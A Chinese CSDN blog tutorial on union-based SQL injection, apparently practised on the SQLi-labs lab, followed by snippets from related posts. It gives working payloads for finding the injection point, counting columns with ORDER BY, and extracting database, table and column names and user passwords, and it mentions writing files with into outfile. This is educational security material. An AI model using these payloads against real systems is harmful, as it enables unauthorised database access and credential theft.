联合注入详解

已于 2025-04-25 23:28:56 修改
阅读量566 收藏 13
点赞数 17
分类专栏: 漏洞学习 文章标签: sql 数据库
于 2025-03-09 19:13:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88816569/article/details/146136729
版权

4.1. 判断注入点(注入类型)

MySQL的注释符号# 或者--+,意思是:只执行前面的语句

方法

  1. 单引号判断法(主要判断法)

当使用一个单引号时,返回错误显示,说明存在SQL注入

无论是数字型还是字符型都会报错,因为查询语句要闭合,引号是成对出现的。

因为在传输该相关数据参数时并没有对其进行仔细过滤,导致直接参与数据库查询。

  1. ?id=1,回显报错,存在注入。

  1. 数字型注入不需要进行闭合,直接插入恶意语句id=-1 union select 1,2,3

此处id=-1不存在表中数值,所以显示联合查询后面的结果集。

下图实例使用less-2

  1. 字符型注入需要找到闭合方式,进行闭合后在插入恶意语句(实战中闭合方式以单 引号居多) id=-1’ union select 1,2,3--+

4.2. 判断列数

因为前后两个结果集的列数必须相同,所以需要先判断列数,再进行 union 语句的 插入,在 mysql 中使用 order by 语句进行列数的判断,对 order by 后面的参数进行 改变,页面报错时说明不存在该列,即可获取表的列数。

?id = 1 order by 3

?id = 1 order by 4

4.3. 判断显错点

因为不是所有的列数会在前端显示,后段虽然执行了,但是前端代码决定显示哪些列

id=-1 union select 1,2,3

4.4. 信息收集(获取数据库名)

获取单个数据?id=-1 union select 1,2,database()

获得多个数个数据库?id=-1 union select 1,2,concat_ws(',',database(),user())

 

其他信息收集的函数

➢into outfile:写文件 {select '' into outfile 'D:/phpstudy/www/ly.php’}

➢load_file():读文件操作

➢concat(str1,str2..):连接字符串,连接两个或多个数组

➢group_concat(str1,str2..):连接字符串,能将相同的行组合起来

➢length() =>计算字符串长度

➢hex() =>字符转换为 16 进制

user() 当前用户名

database() 当前所用数据库

current_user() 当前用户名(可查看权限)

version() 数据库版本

into dumpfile 写文件操作

4.5. 获取表名

id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

4.6. 获取字段名

id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'

4.7. 获取数据

id=-1 union select 1,2,group_concat('~',id,username,password,'~') from security.users

SQL联合注入详解-结合SQLi-lab less1
weixin_45118086的博客
07-09 371
SQL注入详解 首先看一看能不能注入 127.0.0.1/sqli-labs/Less-1/?id=1 order by 3 --+ 发现输入多少都不报错 所以推测应该是字符注入 通过以下两句,判断出字段数为3(order by 4报错) 127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ 127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 --+ 看一下注入点 127.0.0.1/sqli-labs/Less-1/?id=
SQL注入之union联合注入
hobby云说
06-12 3808
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
SQL注入之union 联合注入
weixin_53711701的博客
01-16 5892
SQL注入之union联合注入
SQL注入之路之一:联合注入
weixin_62715196的博客
08-10 1025
简单介绍union联合注入的原理、常用数据库名,以及一次简单的手工联合注入流程
SQL注入进阶:掌握联合查询注入和报错注入攻击技巧
weixin_43263566的博客
01-19 3643
SQL注入联合查询注入与报错注入
sql注入之union联合注入_sql注入union
2401_83739411的博客
04-12 1326
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
SQL注入详解(扫盲篇)
09-09
以及联合查询注入等。 防范SQL注入的关键在于遵循以下几个原则: 1. 使用预编译的SQL语句(如PHP的PDO或MySQLi的预处理语句),它们能有效地防止注入。 2. 对用户输入进行严格的验证和过滤,确保数据格式正确且不...
sqlmap注入详解文档
06-30
### SQLMap注入详解知识点 #### 一、SQLMap概述 - **定义与功能**:SQLMap是一款免费且开源的渗透测试工具,专为自动化检测和利用SQL注入漏洞而设计,并进一步接管数据库服务器。该工具拥有强大的检测引擎以及一...
### 网络安全SQL注入详解:原理、分类与防御措施
最新发布
05-01
接着,文章列举了几种常见的SQL注入类型,如基于布尔盲注、基于时间盲注、报错注入联合查询注入等,并提供了具体的示例代码。此外,还介绍了HTTP头部注入、宽字节注入、堆叠查询注入等特殊类型的SQL注入。对于每种...
sql注入-union注入】 union函数 联合注入
07-11 7665
【union注入】可与报错注入、盲注、堆叠注入等方法结合使用
SQL注入流程(联合注入
qq_64395221的博客
05-17 2174
但是并没有获取到数据,因为当id=1时,查询正常,但只取出了第一列数据;要想第一列取不出数据---要么id特别大,要么id是-1;通过上面的方法,我们已经知道列数了,但是上述方法都需要我们逃逸出单引号,如果没有逃逸出来,mysql会将单引号内当成一个整体,就不会执行后面的命令了。同理空格也需要编码--- %20 (--+也可以;id=-1' union select 1,database(),3--+ 获取到当前数据库。要知道数据库信息,我们可以通过联合查询找到我们想要的信息,但是联合查询。
SQL注入联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
sql注入----union联合注入
2402_83134109的博客
12-22 684
由于每次只能显示1行所以加上limit 0,1,报出了3张表的名字 select * from users where id=1 and 1=2 union select 1,2,3(select table_name from information_schema.tables where table_schema=database() limit 0,1),5,6。在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位。
SQL注入联合注入union
lubiii_的博客
03-14 1070
id=1' ORDER BY 4-- -- 报错,确认字段数为3。id=1' UNION SELECT 1-- -- 字段数不足时报错。id=1' UNION SELECT 1,2-- -- 继续尝试。id=1' AND 1=2-- -- 页面异常(如内容消失)id=1' AND 1=1-- -- 正常。id=1' AND 1=2-- -- 异常。- **方法**:结合报错注入(如`extractvalue()`触发错误回显)或盲注技术(布尔/时间盲注)。id=1' AND 1=1-- -- 正常显示。
外网学习(一) SQL注入——联合注入
qq_35075142的博客
04-04 362
order by:`ORDER BY` 子句的作用是根据指定的列对SQL查询的结果集进行排序。例如:排序2回显正常,排序3回显不支持,则字段数为2.(即表中列数为2)information_schema:是MySQL提供的系统库,有库名,表名的信息。判断可能存在注入点的地方:往往是搜索框,URL栏等一切有可能与数据库交互的地方。#:MySQL中的注释符,#作用为注释后面的语句,类似的还有--+.即替换显错位 1,2 为 user(),database()为判断依据,则为整形。为判断依据,则为字符型。
MySQL之union联合注入
2301_79299101的博客
09-18 209
我们通过-1' union select 1,(select XXX_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)#当输入的参 x 为整型,Sql 语句类型大致如下:select * from <表名> where id = 'x'这样就要用X'and'1'='1和X'and'1'='2来判断了。1,判断是否存在sql注入:通常是id=XXX’输入,看页面是否会报错,如果有报错,则存在sql漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

談不譚網安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值